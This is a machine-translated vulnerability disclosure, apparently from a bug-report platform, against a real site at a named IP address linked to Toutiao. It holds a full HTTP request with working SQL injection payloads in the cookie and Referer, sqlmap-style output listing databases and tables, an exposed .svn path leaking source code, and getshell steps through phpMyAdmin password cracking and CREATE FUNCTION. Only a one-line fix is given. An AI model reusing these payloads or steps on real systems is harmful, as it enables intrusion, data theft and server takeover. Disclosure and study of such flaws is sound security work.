Toutiao's website cookie injection + Source Code leakage + getshell + key Leakage
Toutiao's website cookie injection + Source Code leakage + getshell + key Leakage
Http: // 42.96.190.138/
This site has SQL Injection
There should be more than one
Cookie injection data packets are as follows:
GET /index.php?g=WEBAPP&m=Index&a=getCategoryPagePropertyDepartment HTTP/1.1Host: 42.96.190.138Proxy-Connection: keep-aliveUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2376.0 Safari/537.36Accept: */*Referer: http://42.96.190.138:3333/index.php?g=WEBAPP&page=cusform-formlist&dept_id=1%20and%201=if(1=2,1,(select%201%20union%20select%202))Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2Cookie: PHPSESSID=sqr24iplkeltnokj5g43q7et52; YP_onlineid=%22796df709c9c89a5d3e0e44e600a3efb8%22; last_update_time=2015-04-30+11%3A47%3A55; dept_id=11119 and 1=(updatexml(1,concat(0x3a,(select user() from mysql.user)),1)); YP_think_language=%22cn%22
available databases [2]:[*] information_schema[*] ttbdxt
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150426[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150427[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150422[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150424[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150425[11:59:42] [INFO] retrieved: imi_activity_count_url[11:59:42] [INFO] retrieved: imi_activity_log[11:59:42] [INFO] retrieved: imi_activity_prize55122[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150429[11:59:42] [INFO] retrieved: imi_activity_prize_record55122[11:59:42] [INFO] retrieved: imi_activity_record55122[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150428[11:59:42] [INFO] retrieved: imi_app_log[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150430[11:59:42] [INFO] retrieved: imi_block[11:59:42] [INFO] retrieved: imi_cart[11:59:42] [INFO] retrieved: imi_category[11:59:42] [INFO] retrieved: imi_attachment
Update the latest data every day
Imi_config found
| Minimum Image Width | 0 | http://appadmin.imixun.com/| watermark_minwidth |
| 5 | CMS address | 0 | https://download.imixun.com/index.php? M = Download & appcode = ttbdxt & publishtype = online | site_url |
| 5 | watermark minimum height | 0 | https://download.imixun.com/index.php? M = Download & appcode = ttbdxt & publishtype = online | watermark_minheight
Downloaded and captured
Ttbdxt.imixun.com/index.php? G = API & m = GetActivityDetail
Ttbdxt.imixun.com
This site has the same injection
And is the direct shell with the root permission.
Let's look at 42.96.190.138.
Http: // 42.96.190.138/. svn/entries
Code Leakage
The appid and secret of weixin are also missing.
Although the site injection is not root, phpmyadmin exists.
Http: // 42.96.190.138/phpmyadmin can crack the root password
Simple audit code discovery can also be shell
You can use the create FUNCTION to write data to the shell.
Solution:
Delete svn repair weak password parameter Filtering